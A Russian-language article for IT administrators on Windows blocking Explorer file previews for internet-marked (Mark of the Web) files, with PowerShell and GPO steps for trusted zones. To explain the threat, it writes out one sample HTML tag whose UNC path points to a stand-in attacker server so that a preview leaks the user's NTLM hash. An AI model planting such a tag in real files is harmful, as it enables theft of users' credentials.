Если после очередного обновления Windows 11 или Windows Server 2025 ваши сотрудники начали жаловаться на исчезновение предпросмотра файлов в Проводнике — это не баг и не случайность. Microsoft целенаправленно ограничила эту функцию для файлов, загруженных из интернета. За изменением стоит механизм безопасности под названием Mark of the Web (MotW) — метка, которую Windows автоматически ставит на каждый файл, пришедший извне. В этой статье разберём, что именно изменилось, почему это важно с точки зрения безопасности и как правильно настроить исключения в корпоративной среде через групповые политики.

Что такое Mark of the Web

Mark of the Web — это альтернативный поток данных NTFS (Alternate Data Stream), который браузеры, почтовые клиенты и другие приложения добавляют к файлу в момент его сохранения на диск. Технически это небольшой блок метаданных, прикреплённый к файлу с именем Zone.Identifier. Он содержит информацию о зоне безопасности, из которой был получен файл.

Посмотреть метку можно в PowerShell:

Get-Item -Path "C:\Users\user\Downloads\document.docx" -Stream *

А прочитать содержимое потока:

Get-Content -Path "C:\Users\user\Downloads\document.docx" -Stream Zone.Identifier

Типичный вывод выглядит так:

[ZoneTransfer]
ZoneId=3
ReferrerUrl=https://example.com
HostUrl=https://example.com/files/document.docx

Значение ZoneId=3 означает «Интернет» — самый недоверенный уровень. Именно такие файлы теперь блокируются в панели предпросмотра.

ZoneId	Зона	Описание
0	My Computer	Локальный компьютер
1	Local Intranet	Локальная сеть организации
2	Trusted Sites	Доверенные сайты
3	Internet	Интернет (блокируется)
4	Restricted Sites	Ограниченные сайты

Какую угрозу закрывает это изменение

Панель предпросмотра в Проводнике — удобная вещь, но она имеет серьёзный изъян с точки зрения безопасности. При отображении превью Windows автоматически обрабатывает содержимое файла: рендерит HTML, разбирает структуру Office-документов, загружает встроенные ресурсы. Именно здесь кроется уязвимость.

Злоумышленник может подготовить специально сформированный HTML-файл или документ, содержащий теги <link>, <img src=> или <script> с UNC-путём до подконтрольного сервера:

<img src="\\attacker-server\share\pixel.png">

Когда Windows обрабатывает такой файл при предпросмотре, она автоматически пытается обратиться к указанному серверу и при этом отправляет NTLM-хеш учётных данных текущего пользователя. Этот хеш затем можно перехватить и взломать офлайн — или использовать напрямую в атаке Pass-the-Hash. Самое неприятное: жертве достаточно просто выделить подозрительный файл в Проводнике — никакого открытия или подтверждения не требуется.

Что именно изменилось в обновлениях

Начиная с октябрьских накопительных обновлений 2025 года для Windows 11 и Windows Server 2025, панель предпросмотра (Preview Pane) в Проводнике больше не отображает содержимое файлов, помеченных как ZoneId=3 (Internet). Вместо этого пользователь видит предупреждение:

Файл, который вы пытаетесь просмотреть, может навредить компьютеру.
Панель предварительного просмотра отключена для этого файла.

Изменение затрагивает широкий спектр форматов: HTML, PDF, Office-документы (.docx, .xlsx, .pptx), изображения со встроенными ресурсами и другие типы файлов, которые проходят через обработчики предпросмотра Windows Shell.

Как снять блокировку для отдельного файла

Если файл проверен и безопасен, пользователь может самостоятельно разблокировать его несколькими способами.

Через свойства файла (GUI)

1. Кликните правой кнопкой мыши на файле
2. Выберите Свойства
3. На вкладке Общие в нижней части появится предупреждение и чекбокс Разблокировать
4. Отметьте чекбокс и нажмите OK

Через PowerShell

Для одного файла:

Unblock-File -Path "C:\Users\user\Downloads\document.docx"

Для всех файлов в папке рекурсивно:

Get-ChildItem -Path "C:\Users\user\Downloads\" -Recurse | Unblock-File

Команда Unblock-File просто удаляет поток Zone.Identifier из файла, что эквивалентно ручному снятию отметки через свойства.

Настройка исключений через групповые политики

В корпоративной среде индивидуальная разблокировка каждого файла — не решение. Правильный подход: добавить доверенные источники (корпоративные серверы, внутренние сетевые папки) в зоны безопасности через GPO. Тогда файлы оттуда будут получать ZoneId=1 (Intranet) вместо ZoneId=3, и блокировка превью их не затронет.

Метод 1: Site to Zone Assignment List

Откройте Group Policy Management и создайте или откройте нужный GPO. Путь к настройке:

User Configuration
  → Policies
    → Administrative Templates
      → Windows Components
        → Internet Explorer
          → Internet Control Panel
            → Security Page
              → Site to Zone Assignment List

Включите политику и добавьте записи в формате «значение → зона»:

Имя значения (Value name)	Значение (Value)
\\fileserver\share	1
https://intranet.company.local	1
https://files.company.local	2

Зона 1 — Local Intranet, зона 2 — Trusted Sites. Для UNC-путей используйте зону 1, для внутренних веб-серверов — зону 1 или 2 в зависимости от политики безопасности компании.

Метод 2: Include all network paths in Intranet Zone

Более широкий подход — автоматически относить все UNC-пути к зоне Intranet. Путь в GPO:

User Configuration
  → Policies
    → Administrative Templates
      → Windows Components
        → Internet Explorer
          → Internet Control Panel
            → Security Page
              → Intranet Sites: Include all network paths (UNCs)

Установите значение Enabled.

Метод 3: Управление через реестр (для скриптов и RMM)

Те же настройки можно применить через реестр, что удобно при развёртывании через скрипты или системы управления конечными точками:

# Добавить файловый сервер в зону Intranet
$regPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\fileserver"
New-Item -Path $regPath -Force | Out-Null
Set-ItemProperty -Path $regPath -Name "file" -Value 1 -Type DWord

# Добавить внутренний веб-сервер в зону Intranet
$regPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\intranet.company.local"
New-Item -Path $regPath -Force | Out-Null
Set-ItemProperty -Path $regPath -Name "https" -Value 1 -Type DWord

Для применения через GPO на уровне компьютера (Computer Configuration) используйте ветку HKLM вместо HKCU:

HKLM:\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\

Проверка результата

После применения политик убедитесь, что они действительно работают. Скачайте тестовый файл с внутреннего сервера и проверьте его Zone.Identifier:

Get-Content -Path "C:\Users\user\Downloads\test.docx" -Stream Zone.Identifier

Если файл получен с сервера, добавленного в Intranet Zone, вы должны увидеть ZoneId=1. Если всё ещё показывает ZoneId=3 — политика не применилась. Выполните принудительное обновление:

gpupdate /force

И проверьте результирующие политики для текущего пользователя:

gpresult /r /scope user

Практические рекомендации для IT-отдела

Изменение от Microsoft правильное и давно назревшее — утечка NTLM-хешей через панель предпросмотра была реальным вектором атаки. Но внедрение требует проработки, чтобы не парализовать рабочие процессы сотрудников.

• Инвентаризируйте источники файлов. Определите, откуда сотрудники чаще всего получают рабочие файлы: корпоративный файловый сервер, SharePoint, внутренний портал. Все эти источники должны попасть в доверенные зоны через GPO.
• Не отключайте MotW глобально. Желание «просто убрать раздражающее предупреждение» через отключение Mark of the Web для всех файлов — плохая идея. Это снимет защиту от реальных угроз. Добавляйте только конкретные доверенные домены и серверы.
• Обучите пользователей. Объясните, что предупреждение при предпросмотре файла из письма незнакомого отправителя — это нормально и правильно. Не нужно сразу идти в IT с требованием «починить».
• Проверяйте новые серверы при вводе в эксплуатацию. При добавлении нового файлового сервера или веб-портала сразу вносите его в зону Intranet через GPO, не ждите жалоб от пользователей.
• Используйте LAPS и MFA. Даже если NTLM-хеш будет перехвачен, надёжные пароли (LAPS) и многофакторная аутентификация существенно снижают риск успешной атаки.

Корпоративная безопасность — это баланс между защитой и удобством работы. Mark of the Web — один из тех механизмов, который при правильной настройке обеспечивает и то, и другое: внутренние файлы открываются с предпросмотром, внешние — показывают предупреждение. Потратьте час на настройку GPO сейчас, чтобы не тратить дни на разбор инцидента с утечкой учётных данных потом.